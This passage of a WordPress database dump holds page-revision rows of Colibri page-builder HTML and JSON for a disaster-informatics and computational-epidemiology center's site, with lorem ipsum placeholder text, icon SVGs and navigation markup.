xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',20,'https://gsudice.dataconn.net/?p=288',0,'revision','',0),(289,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',23,'https://gsudice.dataconn.net/?p=289',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (290,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-start align-items-md-start align-items-start style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(196, 182, 182); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path 